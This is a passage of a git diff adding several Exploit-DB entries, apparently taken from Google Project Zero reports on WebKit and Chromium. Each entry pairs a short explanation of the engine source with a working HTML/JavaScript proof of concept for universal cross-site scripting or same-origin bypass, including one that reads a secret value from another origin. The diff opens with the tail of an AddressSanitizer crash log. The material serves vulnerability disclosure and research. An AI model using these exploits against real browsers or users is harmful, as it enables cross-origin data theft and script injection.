+  0x1c2e00009a10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2e00009a20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+=>0x1c2e00009a30: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd
+  0x1c2e00009a40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2e00009a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2e00009a60: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
+  0x1c2e00009a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x1c2e00009a80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==3526==ABORTING
+-->
\ No newline at end of file
diff --git a/platforms/multiple/webapps/42065.html b/platforms/multiple/webapps/42065.html
new file mode 100755
index 000000000..ac111a689
--- /dev/null
+++ b/platforms/multiple/webapps/42065.html
@@ -0,0 +1,81 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1134
+
+Here's a snippet of ContainerNode::parserRemoveChild.
+
+void ContainerNode::parserRemoveChild(Node& oldChild)
+{
+    disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)
+    ...
+    document().notifyRemovePendingSheetIfNeeded(); <<---- (b)
+}
+
+subframes are detached at (a). But In |notifyRemovePendingSheetIfNeeded| at (b), which fires a focus event, we can attach subframes again.
+
+PoC:
+-->
+
+<html>
+<head>
+</head>
+<body>
+<script>
+
+let xml = `
+<body>
+    <div>
+        <b>
+            <p>
+                <script>
+                let p = document.querySelector('p');
+                let link = p.appendChild(document.createElement('link'));
+                link.rel = 'stylesheet';
+                link.href = 'data:,aaaaazxczxczzxzcz';
+
+                let btn = document.body.appendChild(document.createElement('button'));
+                btn.id = 'btn';
+                btn.onfocus = () => {
+                    btn.onfocus = null;
+
+                    window.d = document.querySelector('div');
+                    window.d.remove();
+
+                    link.remove();
+                    document.body.appendChild(p);
+
+                    let m = p.appendChild(document.createElement('iframe'));
+                    setTimeout(() => {
+                        document.documentElement.innerHTML = '';
+
+                        m.onload = () => {
+                            m.onload = null;
+
+                            m.src = 'javascript:alert(location);';
+                            var xml = \`
+<svg xmlns="http://www.w3.org/2000/svg">
+<script>
+document.documentElement.appendChild(parent.d);
+</sc\` + \`ript>
+<element a="1" a="2" />
+</svg>\`;
+
+                            var tmp = document.documentElement.appendChild(document.createElement('iframe'));
+                            tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));
+                        };
+                        m.src = 'https://abc.xyz/';
+                    }, 0);
+                };
+
+                location.hash = 'btn';
+                </scrip` + `t>
+            </b>
+        </p>
+    </div>
+</body>`;
+
+let tf = document.body.appendChild(document.createElement('iframe'));
+tf.src = URL.createObjectURL(new Blob([xml], {type: 'text/html'}));
+
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/multiple/webapps/42066.txt b/platforms/multiple/webapps/42066.txt
new file mode 100755
index 000000000..780f992b4
--- /dev/null
+++ b/platforms/multiple/webapps/42066.txt
@@ -0,0 +1,36 @@
+Sources:
+https://bugs.chromium.org/p/project-zero/issues/detail?id=1146
+https://bugs.chromium.org/p/chromium/issues/detail?id=519558
+
+VULNERABILITY DETAILS
+From /WebKit/Source/core/dom/ContainerNode.cpp:
+
+----------------
+void ContainerNode::parserInsertBefore(PassRefPtrWillBeRawPtr<Node> newChild, Node& nextChild)
+{
+(...)
+    while (RefPtrWillBeRawPtr<ContainerNode> parent = newChild->parentNode())
+        parent->parserRemoveChild(*newChild);
+
+    if (document() != newChild->document())
+        document().adoptNode(newChild.get(), ASSERT_NO_EXCEPTION);
+
+    {
+        EventDispatchForbiddenScope assertNoEventDispatch;
+        ScriptForbiddenScope forbidScript;
+
+        treeScope().adoptIfNeeded(*newChild);
+        insertBeforeCommon(nextChild, *newChild);
+        newChild->updateAncestorConnectedSubframeCountForInsertion();
+        ChildListMutationScope(*this).childAdded(*newChild);
+    }
+
+    notifyNodeInserted(*newChild, ChildrenChangeSourceParser);
+}
+----------------
+
+|parserRemoveChild| can run script, and it can remove |nextChild| from DOM or move the node around. When this happens, the tree will be in an inconsistent state after the |insertBeforeCommon| call, allowing an attacker to bypass the frame restrictions.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42066.zip
diff --git a/platforms/multiple/webapps/42067.html b/platforms/multiple/webapps/42067.html
new file mode 100755
index 000000000..15719fe06
--- /dev/null
+++ b/platforms/multiple/webapps/42067.html
@@ -0,0 +1,89 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1151
+
+Here is a snippet of CachedFrameBase::restore which is invoked when cached frames are restored.
+
+void CachedFrameBase::restore()
+{
+    ...
+    for (auto& childFrame : m_childFrames) {
+        ASSERT(childFrame->view()->frame().page());
+        frame.tree().appendChild(childFrame->view()->frame());
+        childFrame->open(); <----- (a)
+    }
+    ...
+    // FIXME: update Page Visibility state here.
+    // https://bugs.webkit.org/show_bug.cgi?id=116770
+    m_document->enqueuePageshowEvent(PageshowEventPersisted);
+
+    HistoryItem* historyItem = frame.loader().history().currentItem();
+    if (historyItem && historyItem->stateObject())
+        m_document->enqueuePopstateEvent(historyItem->stateObject());
+
+    frame.view()->didRestoreFromPageCache();
+}
+
+enqueuePageshowEvent and enqueuePopstateEvent are named "enqueue*", but actually those *dispatch* window events that may fire JavaScript handlers synchronously. 
+
+At (a), |open| method may invoke |CachedFrameBase::restore| method again. Thus, the parent frame's document may be replaced while |open| is called in the iteration, the next child frame is attached to the parent frame holding the replaced document.
+
+PoC:
+-->
+
+<html>
+<body>
+<script>
+
+function createURL(data, type = 'text/html') {
+    return URL.createObjectURL(new Blob([data], {type: type}));
+}
+
+function navigate(w, url) {
+    let a = w.document.createElement('a');
+    a.href = url;
+    a.click();
+}
+
+function main() {
+    let i0 = document.body.appendChild(document.createElement('iframe'));
+    let i1 = document.body.appendChild(document.createElement('iframe'));
+
+    i0.contentWindow.onpageshow = () => {
+        navigate(window, 'https://abc.xyz/');
+
+        showModalDialog(createURL(`
+<script>
+let it = setInterval(() => {
+    try {
+        opener.document.x;
+    } catch (e) {
+        clearInterval(it);
+        window.close();
+    }
+}, 10);
+</scrip` + 't>'));
+
+    };
+
+    i1.contentWindow.onpageshow = () => {
+        i1.srcdoc = '<script>alert(parent.location);</scrip' + 't>';
+        navigate(i1.contentWindow, 'about:srcdoc');
+    };
+
+    navigate(window, createURL(`<html><head></head><body>Click anywhere<script>
+window.onclick = () => {
+    window.onclick = null;
+
+    history.back();
+};
+
+</scrip` + `t></body></html>`));
+}
+
+window.onload = () => {
+    setTimeout(main, 0);
+};
+
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/multiple/webapps/42068.html b/platforms/multiple/webapps/42068.html
new file mode 100755
index 000000000..b7cfddef7
--- /dev/null
+++ b/platforms/multiple/webapps/42068.html
@@ -0,0 +1,86 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1162
+
+void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
+{
+    m_frame.editor().clear();
+
+    if (!m_needsClear)
+        return;
+    m_needsClear = false;
+    
+    if (m_frame.document()->pageCacheState() != Document::InPageCache) {
+        ...
+        m_frame.document()->prepareForDestruction(); <<-------- (a)
+        if (hadLivingRenderTree)
+            m_frame.document()->removeFocusedNodeOfSubtree(*m_frame.document());
+    }
+    ...
+    m_frame.setDocument(nullptr); <<------- (b)
+    ...
+    if (clearWindowProperties)
+        m_frame.script().setDOMWindowForWindowShell(newDocument->domWindow()); <<------- (c)
+    ...
+}
+
+FrameLoader::clear is called when page navigation is made and it does:
+1. clear the old document at (b).
+2. attach the new window object at (c).
+
+If a new page navigation is made at (a), the new window will not attached due to |m_needsClear| check. As a result, the new document's script will be execute on the old window object.
+
+PoC will reproduce to steal |secret_key| value from another origin(data:text/html,...).
+
+PoC:
+-->
+
+<body>
+Click anywhere.
+<script>
+function createURL(data, type = 'text/html') {
+    return URL.createObjectURL(new Blob([data], {type: type}));
+}
+
+window.onclick = () => {
+    window.onclick = null;
+
+    let f = document.body.appendChild(document.createElement('iframe'));
+    f.contentDocument.open();
+    f.contentDocument.onreadystatechange = () => {
+        f.contentDocument.onreadystatechange = null;
+
+        let g = f.contentDocument.appendChild(document.createElement('iframe'));
+        g.contentDocument.open();
+        g.contentDocument.onreadystatechange = () => {
+            g.contentDocument.onreadystatechange = null;
+
+            f.contentWindow.__defineGetter__('navigator', function () {
+                return {};
+            });
+
+            let a = f.contentDocument.createElement('a');
+            a.href = 'data:text/html,' + encodeURI(`<script>var secret_key = '23412341234';</scrip` + 't>');
+            a.click();
+
+            showModalDialog(createURL(`
+<script>
+let it = setInterval(() => {
+    try {
+        opener[0].frameElement.contentDocument.x;
+    } catch (e) {
+        clearInterval(it);
+        window.close();
+    }
+}, 100);
+</scrip` + 't>'));
+
+            alert('secret_key:' + f.contentWindow.secret_key);
+            //showModalDialog('about:blank');
+        };
+    };
+
+    f.src = 'javascript:""';
+}
+
+</script>
+</body>
\ No newline at end of file
diff --git a/platforms/multiple/webapps/42069.html b/platforms/multiple/webapps/42069.html
new file mode 100755
index 000000000..f0638133f
--- /dev/null
+++ b/platforms/multiple/webapps/42069.html
@@ -0,0 +1,87 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1120
+
+When an object element loads a JavaScript URL(e.g., javascript:alert(1)), it checks whether it violate the Same Origin Policy or not.
+
+Here's some snippets of the logic.
+
+void HTMLObjectElement::updateWidget(CreatePlugins createPlugins)
+{
+    ...
+    String url = this->url(); 
+    ...
+    if (!allowedToLoadFrameURL(url))
+        return;
+    ...
+
+    bool beforeLoadAllowedLoad = guardedDispatchBeforeLoadEvent(url);
+    ...
+
+    bool success = beforeLoadAllowedLoad && hasValidClassId();
+    if (success)
+        success = requestObject(url, serviceType, paramNames, paramValues);
+    ...
+}
+
+bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)
+{
+    URL completeURL = document().completeURL(url);
+    if (contentFrame() && protocolIsJavaScript(completeURL) && !document().securityOrigin().canAccess(contentDocument()->securityOrigin()))
+        return false;
+    return document().frame()->isURLAllowed(completeURL);
+}
+
+bool HTMLPlugInElement::requestObject(const String& url, const String& mimeType, const Vector<String>& paramNames, const Vector<String>& paramValues)
+{
+    if (m_pluginReplacement)
+        return true;
+
+    URL completedURL;
+    if (!url.isEmpty())
+        completedURL = document().completeURL(url);
+
+    ReplacementPlugin* replacement = pluginReplacementForType(completedURL, mimeType);
+    if (!replacement || !replacement->isEnabledBySettings(document().settings()))
+        return false;
+
+    LOG(Plugins, "%p - Found plug-in replacement for %s.", this, completedURL.string().utf8().data());
+
+    m_pluginReplacement = replacement->create(*this, paramNames, paramValues);
+    setDisplayState(PreparingPluginReplacement);
+    return true;
+}
+
+The SOP violation check is made in the method HTMLPlugInImageElement::allowedToLoadFrameURL.
+
+What I noticed is that there are two uses of |document().completeURL| for the same URL, and the method guardedDispatchBeforeLoadEvent dispatches a beforeloadevent that may execute JavaScript code after the SOP violation check. So if the base URL is changed like "javascript:///%0aalert(location);//" in the event handler, a navigation to the JavaScript URL will be made successfully.
+
+Tested on Safari 10.0.3(12602.4.8).
+
+PoC:
+-->
+
+<html>
+<head>
+</head>
+<body>
+<script>
+
+let o = document.body.appendChild(document.createElement('object'));
+o.onload = () => {
+    o.onload = null;
+
+    o.onbeforeload = () => {
+        o.onbeforeload = null;
+
+        let b = document.head.appendChild(document.createElement('base'));
+        b.href = 'javascript:///%0aalert(location);//';
+    };
+    o.data = 'xxxxx';
+};
+
+o.type = 'text/html';
+o.data = 'https://abc.xyz/';
+
+</script>
+</body>
+</html>